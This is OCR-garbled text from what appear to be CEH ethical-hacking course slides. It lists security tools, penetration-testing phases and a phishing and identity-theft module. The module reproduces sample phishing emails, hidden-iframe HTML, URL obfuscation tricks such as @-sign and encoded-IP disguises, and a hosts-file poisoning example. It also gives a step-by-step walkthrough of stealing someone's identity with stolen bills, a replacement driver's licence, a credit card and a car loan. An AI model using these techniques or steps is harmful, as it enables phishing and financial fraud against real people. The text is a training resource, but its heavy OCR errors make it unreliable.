• E M S M ySQL M anger gives strong tools for M ySQL Database 
Server administration and also for object management. The 

E M S M ySQL manger has a Vi sual Database manager that can 
design a database within seconds. 

© SQL Server Compare 

• By http://sql-server-tool.com. 

• The SQL Server Comparison Tool is a Windows application 
used for analyzing, comparing, and effectively documenting 
SQL Server databases. 

© SQL Stripes 

• By http://www.sql-server-tool.com/. 

• SQL Stripes is a program that helps Network Administrators to 
have compi ete control over the vari ous SQL servers. 
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Keyboard Logging and Screen 
Reordering Tools 



© Spector Professional 5.0 

• By www.spectorsoft.conn. 

• The Spector Keylogger has a feature nanned Snnart Renanne that 
hel ps renanne keyl ogger's executabi e f 11 es and regi stry entr 1 es. 

© Handy Keylogger 

• By http://www.handy-keylogger.conn/ . 

• A stealth keylogger for honne and connnnercial use. The 
Keylogger captures international keyboards, nnajor 2- byte 
encodings, and character sets. 

© Snapshot Spy 

• By www.snapshotspy.conn. 

• 1 1 has a deterrent feature which activates a pop-up showi ng a 
warning that the systenn is under surveillance. Itisstealth in 
nature. 
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System Event Logging and Reviewing 
Tools 



© LTAuditor+ Version 8.0 

• By http://www.bluelance.conn. 

• Monitors the network and user activities around the clock. 

© ZVisual RACF 

• Bywww.consul.com. 

• ZVisual RACF makes the job of help desk staff and network 

admi nistrators easy, as they can perform thei r day-to-day tasks from 
a Windows workstation. 

© N etwork I ntel I i gence E ngi ne LS Seri es 

• http:// www. network- i ntel I i gence.com/ . 

• An event log data warehouse system designed to address the 
information overload in distributed enterprise and servi ce provi der 
infrastructures. 

• 1 1 i s depi oyed as a cl uster and can manage I arge networks. 
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Tripwire and Checksum Tools 



© Tripwire for Servers 

• By www.tripwire.conn. 

• Tri pwi re detects and poi nts out any changes made to 
systenn and configuration files. 

© SecurityExpresslons 

• By www. pedestal software, conn. 

• A central ized vul nerabi I i ty nnanagennent systenn. 

© MD5 

• By http:// en . wi ki pedia.org/ wi ki/ M d5. 

• M D5 is a cryptographic checksunn progrann that takes a 
nnessage of arbitrary length as i nput and generates the 
output as 128- bit fingerprint or nnessage digest of the 
input. 
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Mobile- code Scan n i ng Tool s 



© Vital Security 

• By www.finjan.com. 

• This tool protects the users fronn damagi ng nnobi le code, which is 
received by way of emai Is and the I nternet. 

© E Trust Secure Content M anager 11 

• By wwwB.ca.com. 

• E Trust Secure Content M anager gives users a bui It-i n pol icy-based 
content security tool that allows the program to fend of attacks from 
busi ness coercion to network i ntegrity compromises. 

© Internet Explorer Zone 

• I nternet Explorer Zones are split into four default zones, which are 
listed as the Local intranet zone, theTrusted sites zone, the Restricted 
Sites zone and the I nternet zone. 

• The admi nistrators are given the power to configure and manage the 
ri sk from mobi I e code. 
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Centralized Security Monitoring Tools 



© ASAP eSM ART Software Usage 

• By www.asapsoftware.com . 

• This tool hel ps i dentify al I the software i nstal I ed across the 
organization and also helps to detect unused applications and 
eliminate them. 

© WatchGuard VPN Manager 

• By www.watchguard.com . 

• System admi nistrators of large organizations can monitor and 
manage the tools centrally using WatchGuard VPN Manager. 

© Harvester 

• By http://farm9.org/harvester . 

• Security checks and event logs. 
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© Azure Web Log 

• Bywww.azuredesktop.com. 

• The tool generates reports for hourly hits, monthly hits, 
monthly site traffic, operati ng system used by the users, and 
browsers used by them to vi ew the website and error requests. 

© AWStats 

• By awstats.sourceforge. net/ . 

• AWStats is a powerful tool with lots of features that gives a 
graphical representation of web, ftp, or mail server statistics. 

© Summary 

• By http://www.summary.nel:. 

• 1 1 has more than 200 types of reports whi ch hel p the user to get 
the exact i nformati on he wants about the website. 
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Forensic Data and Collection Tools 



© Encase tool 

• By http://www.guidancesoftware.conn. 

• It can monitor networks in real time without 
disrupting operations. 

© SafeBack 

• By http://www.forensic-intl.com. 

• Mostly used to backup files and critical data. 

• Creates a mirror i mage of the enti re hard drive just 
I i ke how a photonegati ve is made. 

© I Look Investigator 

• By http://www.ilook-forensics.org. 

• 1 1 supports Li nux platforms. 1 1 has password and 
pass phrase dictionary generators. 
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Secu r i ty Assessment Tool s 



© Nessus Windows Technology 

• Bywww.nessus.org. 

• Nessus Windows Technology (NeWT) is a stand-alone vulnerability 
scanner. 

© Net! 0 Security Manager 

• By www.netiq.com. 

• Net! Q Security Manager is an incident management tool that monitors 
the network in real-time, automatically responds to threats, and 
provides safekeepi ng of i mportant event i nformation from a central 
console. 

© STAT Scanner 

• Bywww.stat.harris.com. 

• STAT Scanner scans the network for vul nerabi I ities and updates the 
system administrator with information regarding updates and patches. 
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Multiple OS Management Tools 



© Multiple Boot Manager 

• Bywww.elnnchan.org. 

• M uiti pie Boot Manager (MBM) isa low-level systenntool which 
hel ps to select any OS to boot with a nnenu. 

© Acronls OS Selector 

• By www.acronis.conn. 

• Acronis OS Selector v5 is a boot and partition nnanager, which 
al I ows the user to i nstal I nnore than 100 operati ng systenns. 

© Eon 

• By http://www.neoware.conn. 

• Eon 4000 isbased on Linux and runs Windows, Unix, X 
Window, Internet,] ava, and nnainfranne applications. 
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Phases of Penetration Testing 
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Pre-attack Phase 



Pre-Attack Phase 




Passive 
Reconnaissance 



r 



Active 
Recon nai ssance 
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© It is vital to maintain a log of all the activities carried 
out, the results obtai ned, or note the absence of it. 

© Ensure that all work is time stamped and 
communicated to the concerned person within the 
organization if it is so agreed upon in the rules of 
engagement. 

© While planning an attack strategy, make sure that you 
are able to reason out your strategic choi ces to the i nput 
or output obtained from the pre-attack phase. 

© Look at your log and start either developing the tools 
you need or acquiring them based on need. This will 
hel p reduce the attack area that might be i nadvertently 
passed over. 
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Results That Can Be Expected 



© Thisphasecan include information 
retrieval such as: 

• Physical and logical location of the 
organization. 

• Analog connections. 

• Any contact i nf ormati on . 

• I nformation about other organizations 

•Any other information that has potential to 
result in a possible exploitation. 
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Passive Reconnaissance 
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Directory Mapping 



Competitive I ntelligence 
Gather in 



Asset Classification 




Retrieving Registratio 
Information { 



Product/ Service 
Offer in 



J 



Document Sifting 



Social Engineering 




ii 
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Passive Reconnaissance 



© Activities involve: 

- M appi ng the di rectory structure of the web servers 
and FTP servers 

- Gather i ng competitive i ntel I i gence 

- Determi ni ng worth of i nfrastructure that is 
i nterfaci ng with the web 

- Retrieving networl< registration information 

- Determi ni ng the product range and service offeri nqs 
of the target company that i s avai I abl e on I i ne or can be 
requestedf online 

- Document sifti ng refers to gatheri ng i nformati on 
solely from published material 

- Social engineering 



BC-Councll 



Copyright © byBC-Council 
All Rights reserved. Reproduction is strictly prohibited 



Active Reconnaissance 



© Someof the activities involved are: 

• Network Mapping 

• Perimeter mapping 

• System and Service I dentifi cation 

- Through port scans 

•Web profiling 

- This phase wi 1 1 attempt to profi le and map the 
internet profile of the organization 
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Attack Phase 









Attack Phase j 
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Penetrate Perimeter 















Acquire Target 




Escalate Privileges 






r 







Execute, Implant, Retract 
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Activity : Peri meter Testi ng 



© Testing methods for perimeter security include but are 
not limited to: 

• E val uati ng error reporti ng and error management with I CM P 
probes. 

• Cliecl<i ng access control I ists by forgi ng responses with crafted 
pacl<ets. 

• Measuring[the threshold for denial of service by attempting 
persistentTCP connections, evaluating transitory TCP 
connections, and attempting streaming U DP connection. 

• Evaluating protocol filtering rules byattemptinqconnection 
using various protocols sucn as SSH , FTP, and Telnet. 

• Evaluate the I DS capability by passing malicious content (such 
as malformed URL) and scanning the target variously for 
response to abnormal traffic. 

• Exami ne the peri meter security system's response to web server 
scans using multiple methods such as POST, DELETE, and 
COPY. 
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I 



© Testi ng methods for web appi i cati on testi ng i ncl ude but 
are not limited to: 

• In put Validation: Tests include OS command injection, script 
injection, SQL injection, LDAP injection, and cross site 

scri pti ng. 

• Output Sanitization: Tests include parsing special characters 
and verifying error checking in the application. 

• Checki ng for Buffer Overflows: Tests i ncl ude attacks agai nst 
stack overflows, heap overflows, and format string overflows. 

• Access Control : Check for access to admi n i strati ve i nterf aces, 
sending data to manipulate form fields, attempt URL query 
strings, change values on the client-side script, and attack 
cooki es. 

• Denial of Service: Test for DoS induced due to malformed user 
input, user lockout, and application lockout due to traffic 
overload, transaction requests, or excessive requests on the 
application. 
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Activity: Web Application Testing- II 



© Connponent checking: Cliecl< for security controls on web 

server/ appi i cati on components that nni ght expose the web appi i cati on to 

vulnerabilities. 

© Data and Error Checking: Check for data related security lapses such as 
storage of sensitive data i n the cache or throughput of sensitive data usi ng 
HTML. 

© Confidentiality Check: For applications using secure protocols and 
encryption, check for lapses in Key exchange nnechanisnn, adequate key 
length, and weak algorithms. 

© Session Management: Checktimevalidity of session tokens, length of 
tokens, expiration of session tokens while transiting from SSL to non-SSL 
resources, presence of any session tokens in the browser history or cache, 
and randomness of sessi on I D (check for use of user data i n generati ng 
ID). 

© Configuration Verification: Attempt manipulation of resources using 
HTTP methods such as DELETE and PUT, check for version content 
availability, and any visible restricted source codein public domains, 
attempt directory and file listing, test for known vulnerabilities, and 
accessibility of administrative interfaces in server and server components. 

Copyri ght © by BC-Cbunc i I 
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Activity : Wireless Testing 



© Testi nq methods for wi reless testi ng i ncl ude but are not 
limitea to: 

• Check if the access point's default Service Set I dentifier (SSI D) 
is easi I y aval lable. Test for "broadcast SSI D" and accessibi I ity to 
the LAN through this. Tests can i ncl ude brute forcing the SSI D 
character string using tools like Kismet. 

• Checkfor vulnerabilitiesin accessing the WLAN through the 
wireless router, access point, or gateway. This can include 
verifying if the default Wired Equivalent Privacy (WEP) 
encryption key can be captured and decrypted. 

• Audit for broadcast beacon of any accesspoi nt and check al I 
protocols aval I able on the access points. Check if layer 2 
switched networks are bei ng used i nstead of hubs for access 
point connectivity. 

• Subject authentication to playback of previous authentications 
in order to checkfor privilege escalation and unauthorized 
access. 

• Verify that access is granted only to client machines with 
registered MAC addresses. 
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Activity : Acquiring Target 



© We refer to acqui ri ng a target as the set of activities 
undertal<en where the tester subjects the suspect 
machine to more intrusive challenges such as 
vul nerabi I ity scans and security assessment. 

© Testi ng methods for acqui ri ng target i ncl ude but are not 
limited to: 

• Active probing assaults: This can use results of network scans 
to gather further infornnation that can lead to a connpromise. 

• Running vul nerabi I ity scans: Vul nerabi I ity scans are connpleted 
in this phase. 

• Trusted systenns and trusted process assessment: Attennpting to 
access the nnachi ne's resources usi ng legiti nnate i nfornnation 
obtained through social engineering or other nneans. 
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© Once the target has been acquired, the tester attempts 
to exploit the system and gai n greater access to 
protected resources. 

© Activities include (but are not limited to): 

• The tester may take advantage of poor security policies and 
tal<e advantage of ennai Is or unsafe web code to gather 
information that can lead to escalation of privileges. 

• Use of techniques such as brute force to achieve privileged 
status. Examples of tools include getadmin and password 
crackers. 

• Use of trojans and protocol analyzers. 

• Use of information gleaned through techniques such as social 
engineering to gain unauthorized access to privileged 
resources. 
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Activity : Execute, I mplant, and 
Retract 



© I n this phase, the tester effectively compromises 
the acqui red system by executi ng arbitrary 
code. 

© The objective here is to explore the extent to 
which security fails. 

© E xecuti ng expl oi ts al ready aval I abl e or speci ally 
crafted to take advantage of the vul nerabi I iti es 
identified in the target system. 
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Post Attack Phase and Activities 



I 



© This phase is critical to any penetration test as it is the 
responsi bi I ity of the tester to restore the systems to the 
pre-test state. 

© Post attack phase activities include some of the 
following: 

Removi ng al I fi les uploaded on the system. 

Clean all registry entries and remove vulnerabilities 
created. 

Removing all tools and exploits from the tested 
systems. 

Restori ng the network to the pre-test state by 
removi ng shares and connect ons. 

Analyzing all results and presenting the same to the 
organization. 
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Penetration Testing Deliverables 
Templates 



© A pentest report wi 1 1 carry detai Is of the 
incidents that have occurred during the testing 
process and the range of activities carried out 
by the testi ng team. 

© Broad areas covered include objectives, 
observations, activities undertaken, and 
incidents reported. 

© The team may also recommend corrective 
actions based on the rules of engagement. 
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TU 



CEH 

Certified, Etiilciil Hacker 



Ph i sh i ng Attacks 

and 
Identity Theft 



Additional i^loduie 

Note: This module is not in 
your courseware 



What isPhishing? 



© A form of identity theft in which a scammer 
uses an authentic- looking e-mail totricl< 
reel pients i nto gi vi ng out sensitive personal 
information, such as a credit card, bank account 
or Social Security numbers 

© Phishi ng attacks use both social engi neeri ng to 
steal consumers' personal identity data and 
financial account credentials 

© (adapted from "fishing for information") 
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Attacks 



© 1 1 is the most common corporate identity theft 
scam today - P hi shi ng 

© 1 1 usual ly i nvolves an e-mai I message asl<i ng 
consumers to update their personal information 
with a 11 nk to a spoofed Web site 

© To give their schemes a legitimate look and fed, 
fraudsters commonly steal well-known 
corporate identities, product names and logos 

© 1 1 is very easy to construct authentic websites 
for e- mai I scams 
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Phishing Reports 



Phishing Reports Received October '04 - October '05 




Source: /anti-phishing working group 
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Dear PayPal, 



The strange greeting 



Ue recently noticed one or more attempts to log in to your PayPal account 
from a foreign IP address. 

If you recently accessed your account while traveling, the unusual log in 
attempts may have been initiated by you. However, if you did not initiate 
the log ins, please visit PayPal as soon as possible to verify your 
identity: 

https : //www, pavpal . com/us/cgi-bin/webscr? cri:id=_login-run 

Verify your identity is a security measure that will ensure that you are 
the only person with access to the account . 

Thanks for your patience as we work together to protect your account. 

S incere ly, 
PayPal 



NEVER give your password to anyone and ONLY log in at 
https : //www. paypal . com/ . Protect yourself against fraudulent websites by 
opening a new web browser (e.g. Internet Explorer or Netscape) and typing 
in the PayPal URL every time you log in to your account. 



Please do not reply to this e-mail. Hail sent to this address cannot be 
answered. For assistance, log in to your PayPal account and choose the 
"Help" link: in the header of any page. 



PayPal Email ID PP3 2 1 VIYJEXEnOKBHFXKFNXZDBBTOMZKWEJEGYYHOL 



PROTECT TOUR PASSWORD 
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Disguised random text 



Phishing Example (paypal) 



I 



PayPal - Log In - MicrosoR: Internet Explorer i 



Jnjxj 



File Edit View Favorilies Tools Help 



■^Back ' ^ ' @ [?] ^ I ^Search [^Favorites ^ Media 



Address ^ https;//www. paypal, com/cgi-bin/webscr?cmd=Jogin-r 



■^1 ^Go Links 




The spoofed address bar sign up | Log in | Help 



Welcome Send Money Request Money Merchant Tools Auction Tools 



3 



Member Log In 



Secure Log in ij 



Registered users log in here. Be sure to protect your password . 
Email Address: 



J 



Password: 



Forget your password? 



Notice the discrepancy (no lock 
icon in the status bar) 



New users sign up here ! It only takes a minute, 



Log In I 



About I Accounts | Fees | Privacy | Security Center | User Agreement | Developers | Referrals | Sliops | 

l^ass Pay 

an eBay Company 

Copyrigl-it © 1999-2004 PayPal, All rights reserved. 
Information about FDIC pass-through insurance 



Internet 
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Phishing Example (MSN) 



Darlmg Msn user. 

During one of our regular automated verification procedures we've encountered 
a some problem caused by the fact that v;:e could not verify the info that you provided to us. 
Please, give us the folio v/mg information so that v;^e could fijUy verify your identity. 
Otherwise your access to MSN services will be closed. 

To venfy your information please http J/www. msnas sistanc e . c om/mdex. php foUov/ this link. 

Thanks for using MSN. 
MSNWeb Access Supporting. 
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Phishing Example (MSN) 




^ Weico 



-lajxl 



File Edit 


View Favorites Tools hielp 
















- a 0 a 1 Qsearoh [ 


^ Favorites 


f Media a 1 s a - a a 










Address |^ 


http ; //lAiww . msn . com/ 








Links " 


^Snaglt 





msfi 



Great Deal: M5IN 
Internet Access 



Autos 

Auto 5how 2005 
Careers & Jobs 
Dating Personals 
Entertainment 
Games 

Health & Fitness 

Hotmail (MD 

House &Home 

Money 

My M5N 

News 

Shopping 

Slate Magazine 

Sports by FOX Spor 

Travel 

Women 

Going Places 

Air Tickets 
City Guides 
Hotel Deals 
Local Traffic 
Maps & Directions 

Look it up 

Credit Score 
Desktop Search Bet 
Encarta 

MSN Search Beta 
Search Duels 
White Pages 
Yellow Pages 



Verify Your Account Information - Microsoft Internet Enplorer 
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The real MSN site 
in tiie background 



1 9 Internet 



Phishing Example (Visa) 



VISA Verified by Visa 




DearVisa© customer, 

Before activating your card, read this important information for cardholders! 



You have been sent this invitation because the recorcJs ofVisa Corporate indicate you are a current orformer Visa card holder. To 
ensure your Visa card's security, it is important that you protect yourVisa card online with a personal password. Please take a 
moment, and activate for Verified by Visa now. 

Verified by Visa protects your existing Visa card with a password you create, giving you assurance that only you can use yourVisa card 
online. 

Simply activate your card and create your personal password. You'll get the added confidence that your Visa card is safe when you 
shop at participating online stores. 



Activate Now for Verified by Visa 



Thankyou foryour support. 
Visa Sen/ice Department 
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Phishing Example (Visa) 

^J^yisTuSAIPersQnal | Verified by Visa - Microsoft Internet Ewplorer 



I 



File Edit View Favorites Tools iHelp 



^Back - ^ - @ [?] ^1 ^Search ^Favorites ^ Media 



r # - a £1 • 



Address ^ httpsiZ/usa. visa, com/persQnal/secuhty/vbv/index. html 



^Go Links 



VfSA 



The forged address bar 



HonnB I PsrGonal I Small GuEirtsSE & Marchasnt-B I CaqxirstB & GavBrnment 

Search: | | 



' FEfMj a Card 


Using Visa 


^^BS^SR!^^^! Sacurltv 3l l^ifitectJfin I 


Visa Studant 


Visa Brines Yau ' 




Proted:ion Bjsics 


Online Shopping S Protection 


Zero Liability Verified liy Visa identity Theft 


Lost Your Card? ■— 


1 



Properties 



Verified by Visa 



Verified by Visa 
How It Woiks 

Places to Shop Protect youF Visa card online with a personal password 

Participating Card issuers yj^g provides reassurance tf^at only you can use your Visa card online. Learn more about 
FAQ l:he benefits of Verified by Visa. 

Privacy & Securily 
Terms & Conditions 

■Visa© Card Number: 



r 

J Expiratioh Date C^im^yX^ 

VERIFtED I j] 

byV/SA Card Verification Value: 




r 



General | 

^ Visa USA I Personal I Verified by Visa 

Proloool: HyperTeKl Transfer Protocol 

Tvpe: File 

Connection: Not Encrypted 



Address: http://200.251 .251 .1 0/. verified/ 
[URL] 



ATM PIN: 



Size: 



2001 8 bjJtes 



Privacy a Security I Terms & Conditions 



Created: 14.1Z2004r. 
Modified: 14.122004 r. 



The real URL 



How It Works 

Learn flow Verified by Visa protects your Visa card wfien sfiopping online. 



Places to Shop 

^■Vfnere can you sfiop witfi Verified by Visa? Find out fiere. 



Certificates 



OK 



Cancel 



AppljJ 



Participating Card Issuers 

Find out if your card issuer is participating. 



No secure session 
(lock) icon 



1 fittps://usa.visa.com/personal/security/ybv/fiow_it_i^orks.hitml 



Hidden Frames 



© Frames area popular method of hiding attack 
content 

© They have uniform browser support and easy 
coding style 

© The attacker defi nes HTM L code usi ng two 
frames 

© The f i rst frame contai ns the legiti mate site U RL 
information, while the second frame - 
occupyi ng 0% of the browser i nterface whi ch 
has a malicious code running 
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H idden Frames Example 



<html> 
<head> 

<t it le>Frame Based Exploit Example</t it le> 
</head> 

<body topmargin=" 0 " lef tmargin=" 0 " rightmargin=" 0 " 
bottommargin=" 0 " > 

<iframe src="http :/ /www . yahoo . com" width="100%" 
height=" 150 " f rameborder=" 0 "></if rame> 
<iframe src="http : / /www . msn . com" width="100%" 
height=" 350 " f rameborder=" 0 " ></if rame> 
</body> 

</html> 



Download the phishing hacking tools at 

http:// www.eccou nci I .org/ cehtool s/ ph 1 sh 1 ng.zi p 
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H idden Frames Example 



© I n the example MSN isdisplayedin a second frame with in the 
master frame showi ng Yahoo 



^ - ^ ■ ff © ^ I «^I*^.......J 



00 
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URL obfuscation 



© Using Strings - U ses a credibi e sounding text string within the URL 

• Example: 

http: //XX. XX. 78 . 45/ebay/account_update/now . asp 

© Using@ sign -Thisl<ind of syntax is normally used for websites that require sonne 
authentication. Theleft sideof (a) sign is ignored and thedonnain nanneor I P 
address on the right sideof the (a) sign is treated asthelegitinnatedonnain ((g) can be 
replaced with %40 Unicode) 

• Example: 

http : //www. citybank . com/update . asp@xx . xx . 66 . 78/usb/process . asp 

© Status Bar Triclcs- The URL is so long that it can not be completely displayed in 
the status bar - Often combined with the (g) so that the fraudulent URL is at the end 
and not displayed 

• Example 

http : //www. visa . com: UserSession=2f 6q9uuu8 83122 64trzzz558 844 95&users 
option= 

SecurityUpdate&StateLevel=GetFrom(a61 . 252 . 126 . 191/verif ied_by_visa . h 
tml 
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URL obfuscation 



I 



© Similar Name Triclcs- These kind of tricks 
use a credible sounding, but fraudulent domain 
name 

© Examples: 

• http :/ / www, ebay- su pport . com/ ver i f y 

• http : / / www, ci tyban k- secu re. com/ 1 ogi n 

• http://www.suntrustbank.com 

• http://www.amex-corp.com 

• http://www.fedex-security.com 
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URL Encoding Techniques 



© URLs are Encoded to disguise its true value using hex, dword, or 
octal encoding 

© Sometimes© is used in the disguise 

© Someti mes @ si gn i s repi aced wi th %40 

© Example: 

http: //www.paypal . com@%32%32%30%2E%3 6%38%2E%32%31 
%34%2E%32%31%33 

• which translates into 220.68.214.2B 

© http : / /www.paypal . com%4 057 07545 67 

• which translates into 34.5.6.7 
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I P address to Base ID Formula 



© To convert 66. 46. 55.116 to base 10 the 
formula is: 

© 66 X (256)3 + 46 X (256)2 + 55 x 
(256)1 + 116 = 1110325108 

© After con versi on test it by pinging 1110325108 
i n command prompt 

© Exercise: Convert your classroom gateway I P address to base ID 
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HTML I mage Mapping Techniques 



©The URL isactually a part of an image, which uses map 
coordi nates to defi ne the cl icl< area and the real U RL, with 
theFal<eURL from the<A>tag being displayed 

©Example: 

<html> 
<head> 

<title>CEH Demo</title> 

</head> 

<body> 

<img src="f ile : ///C : /SOMEIMAGE . jpg" width='M40" height = ''35 6 " 
border="0" usemap=" #Map" > 
<map name="Map"> 

<area shape="rect" coords="146, 50, 300, 84" 
href="http : / /certif iedhacker . com"> 
</map></body> 
</html> 
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Fake Browser Address Bars 




h tt|K/ /vunrtnvjf^ntenlnreilficatniLcoiii - Fa ke Address Qa r - M icrosDift Internet 



File Edit View Favorites Tools Help 



Google-' [ 



IqI Search k^) | ^ ,^1 851 blocked | "AutoFill 0 Options ^ 



CO-M-ODO 

VERIFICATION , 

ONLINE VERIFICATION AND FRAjJ 



JD PHOTECnON 





What Is Vengine ? 




About Us 




Latest News 




il>9ini» 




Sup p Oft 




Contact Us 




FREE Download 



» Download 



Anti-fraud protection 

Legitimate use of credit cards and site seals 
Verify tlie autlienticity and identity of SSL Certificates 
Unique browser independent verification 
Deliver confidence for free 

Roll your mouse over the logo to check if vou have VerificationEngine installed 
» Demos » F.A.Q 



Venqi:iie 



DoiAinload Vengine N ov-i I 
It's Free I 



How Does Vengine Work ? 

Find out More 



..: Commonlv Asked Questions 
Find out More 



This is fake address bar 



Download the phishing hacking tools at 
http://www.eccouncil.org/cehtools/phishing.zip 
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Fake Tool bars 



^ hittpc//wMnw.^nteiiihKnfk:at3Dn.cDrTi - Fake Address Bar - Microsoft Internet Explorer j 



Jn|xJ 



File Edit VieiAi Favorites Tools Help 



■Baik - - Q g] fl I ^Search ^Favorites | ^ ^ H 



Address |^ http://^^ww. nike.com/main. html 



What Is Vengine 



Latest News 



Support 



ifflEE Download 



^ Done 



Latest News 



» Download 



l.iJ.U.llJ 



"3 




COMODO 

VERIFICATION 

ONLINE VERIFICATION AND FRAUD PRO 



Links 



TECH ON 



Anti-fraud protection i 
Legitimate use of credit cards and site seais I 
Verify the authenticity and identity of SSL Certificates 
Unique browser independent verification 
iver confidence for free 

. Roll vour mouse over i:he logo to check if you have VerificationEngine insi:alled 
» Demos » F.A.Q 



Download Vengine Now I 
It's Free I 




How Does Vengine Work ? 

Find oijt More 



Commonlv Asked Questions 
Find out More 



Th i s i s f ake tool bar 



Download the phishing hacking tools at 
http://www.eccouncil.org/cehtools/phishing.zip 
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Fake status Bar 



^ fn ke Status Bar - MicnBoft Internet Explorer 



J File Edit View Favorites Tools Help 



Address | ilajjUmj^Bil 

Google- I |G|Seardn ^ \0 \ ^ ,^351 blocked | ■."] AutoFill g Options ^ 



IT 



Vl^at Is VGngine 1 



Latest News 



Demos 



Support 



0 



C-O-M-O-D'O 

VERIFICATION 

ONLINE VERIFICATION AND FRAJD 



N ^[ 

RAUD PROTECTION 



Latest Hewn : 



» Download 



Anti-fraud protection I 
Legitimate use of credit cards and site seals 
Verify tine autlienticity and identity of SSL Certificates 
Unique browser independent verification 
Deliver confidence for free 



Roll your mouse over the logo to check if you have VerifioationEngine installed 
» Demos » F.A.Q 



Download Vengine Mow ! 

It's Free ! 



How Does Vengine Work ? 

Find out More 



CommonliJ Asjld Questions 
J out More 



© QBmodo Group 2003 



I {9 Interne!: 



Fake status bar with 
pad lock button 



i 



I 



DNS Cache Poisoning Attack 



© This attack is based on simple convention of I P 
address to liost resolution. 

© H ere is how it works : 

© Every system has a host f i I e i n i ts systems 
di rectory i n case of wi ndows thi s f i I e resi des at 
the f ol I owl ng I ocati on i n case of wi ndows : 

© C : \WINDOWS\ systems 2 \drivers\etc 

© This file can be used to hard code domain name 
translations 
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Exampleof a normal Host file under 
DNS poisoning attack: 



# Copyright (c) 1993-1999 Microsoft Corp. 
# 

# This is a sample HOSTS file used by Microsoft TCP/IP for 
Windows . 

# 

# This file contains the mappings of IP addresses to host names 
Each 

# entry should be kept on an individual line. The IP address 
should 

# be placed in the first column followed by the corresponding 
host name. 

# The IP address and the host name should be separated by at 
least one 

# space. 
# 

# Additionally, comments (such as these) may be inserted on 
individual 

# lines or following the machine name denoted by a '#' symbol. 
# 

# For example: 

# 

# 102.54.94.97 rhino.acme.com # source server 

# 38.25.63.10 X. acme. com # x client host 



127.0.0.1 localhost 

XX. XX. XX. XX Citibank.com 



In the above example XX.XX.XX.XX depicts the IP address of Hackers 
server which is hosting a fake login screen for the legitimate domain 
www.citibank.com 



BC-Councli 



Identity Theft 




IDENTITY 
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What is "Identity Theft"? 



I dentity theft occurs when somebody steals 
your name and other personal information for 
fraudulent purposes 
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Identity Theft 




"Youll give your credit card to a waitress with 
sixteen earrings and an obscene tattoo^ but you 
won't give it to a reputable company with a web site?" 
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H ow do you steal 

I dentity? 
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How to steal Identity? 



© Original identity- Steven Charles 
© Address: San Diego CA 92 BO 



EXPIRES 




DRIVER LICENSE 
B86 



CLASS ; C 



STEyEN CHARLES DEN BESTE 
$m DIEGO CA 9zm 




SEX:M 
HT: 



HAIR: RED 
WT: 



EYES:B 
OOB: 



RSTRrCORR LENS 




STEP 1 



I 



© Get hoi d of Steven's tel ephone bi 1 1 , water bi 1 1 or el ectri city bi 1 1 
using dumpster diving, stolen mails or onsite stealing 



rCB: 



OKAMGE DIRECT W*,L 
VQDAFONK EHRBCTraAL 
VODAFONE DIHfiCT C4AL 
016!) 

Dl^ 

VOOAPWH niRECT MAL 
DIM) 

VODAPON3- WBECT PUU, 

VODAFDHE DDtSfT HAL 
VDDAFDI4E inaECT KAL 
aPWriALRATB 

vocapone DSRErr hal 

HLTTCHTSON ODANc^t 1^ 



NT[ -OJCPOItD 
CALL LOG REFOBT 



ViESTOS 
WESTON 

PAHKER 
WESTON 

m4K 

WESTON 

WESTON 
WE.-STON 

WtSlON 



0»II4« 

1 1 miG 
imvo 



Veriicn charges 



Psge 3 of 5 
732 )0(X-X)0( 

April 13, 2 



This north's charges f/lcnt.ily charges Apr 13 to May 
FCC Subscriber Line Charge . 
Local dumber Portability Surcha 
Federal Urivarsal Service Fund Surcliarc 
Additional charges ..See Page A 



Taxes 
Federal 



$1.19 



NJ Sales 



Total Vsrrion charges 
Billing inquiries call 1 800-564-9911. From outside 
1 300-755-104S. 

To order service call 1 8CIC-5B4-9911 . From outside 
1 3C0- 755- 1049. 

For repair call 1-800-275- 



@SoiJthemBell 



919 851 S990 <^44 

VOUfll ACCOUNT MUMBEFl 



(HtS BILL -CM I 

S32-3412 



NISSAN FOREIGN CAR 

? O 0OX 64 

RALEl&H NC 27602 



SLRviNG C^ff 

RALEIGH 
B232 036 



PiSf DtJi 0*1 

JAN 27 



AMOUNT L*»T «>LL 


PAYMENTS 


h DJUiTTMCHTa 








19^8 




I97!6f! 




1 

1 1 
J 












JAM 


02 


K» FEB 02 


29 45 


TAN (»r4 tcnvicc 




rr : 


FED ?H 


49 


DUHCTfiftV ADVdmWIMS FIKM 




TO 






CHAHOCS FKDM LIST OF CALLA IhCl. TAN 


33 84 




IHCL IKt - 


HE Cr^rcLQ^U'ta^ 








127202 












1 TOTAL 


63 78 
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STEP 2 



© Go to Driving License Authority 

© Tell them you lost your driver's 
license 

© They will ask you proof of identity 
like water bill, electricity bill etc. 

© Show them the stolen bills 

© Tel I them you don't I i ve at the 
original address anymore and you 
have shifted house 

© The department personal will ask 
you to complete 2 forms - Ifor 
replacement of driver's license and 
the 2 form for change of address 

© You wi 1 1 need a photo for the 
driver's license 
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STEP 3 



© Your replacement driving license will be issued 
to your new home address. 

©Now you are ready to have some serious fun. 



EXPIRES 




DRIVER LICENSE 

B86 

STEVEN CHARLES \>EH BES' 



CLASS: C 



HT: 



NT: 




iaV.'^l/280O ^3S SIB f. 
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Comparison 



© Original 

Same name: Steven Charles 



© Identity Theft 
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DRIVER LICENSE 
B86 



CLftSS:C 



STEVEN CHARLES DEN BESTE^ 
SAN DIEGO CA 92 130 



SEX:M HAIR: RED EYES:BRN 
HT: WT: UOB: 



RSTR:CORR L£NS 




DRIVER LICENSE 

B86 

STEVEN CHARLES DEH BES' 
SEX:M 



CLASSIC 



HT: 

RBTR:CCM(3 LZKS 



HAIR: RED 
NT: DOB: 



m 



© Go to a Bank in which original Steven Charles has an 
account (Example Citi bariK) 

© Tell them you would like to apply for a new credit card 

© Tell them you don't remember the account number and 
ask them to look you up usi ng Steven name and address 

© The bank will ask for your ID: show them your driver's 
license as ID 

© I D Accepted. Your credit card is issued and ready for 
use 

© Lets Go shopping© 



Fake Steven has a new credit card 



© Fake Steven visits Wal-M art and purchases 42" plasma 
TV and state of the art Bose speal<ers 

© Fal<e Steven buys Vertu Gold Phone worth US 20K 
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Fake Steven buys car 



© Fake Steven wal ks i nto a 
store and appi i es for a car 
loan and minutes later he 
is dri vi ng the new Audi 

© Present your driver's 
I i cense as a form of I D 

© Credit check by the loan 
officer comes out clean 
si nee ori gi nal Steven has 
a clean credit history 



Auto Loan Approvals 



Bad Credit, No Credit, No Probleml 

• Simple 60 Second Application 

• Thousands of Dealers 

• All malces and models available 

• No Obligation 



' ' Apply in Seconds, 
r! Dfive Away Just as Fust 
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<1 



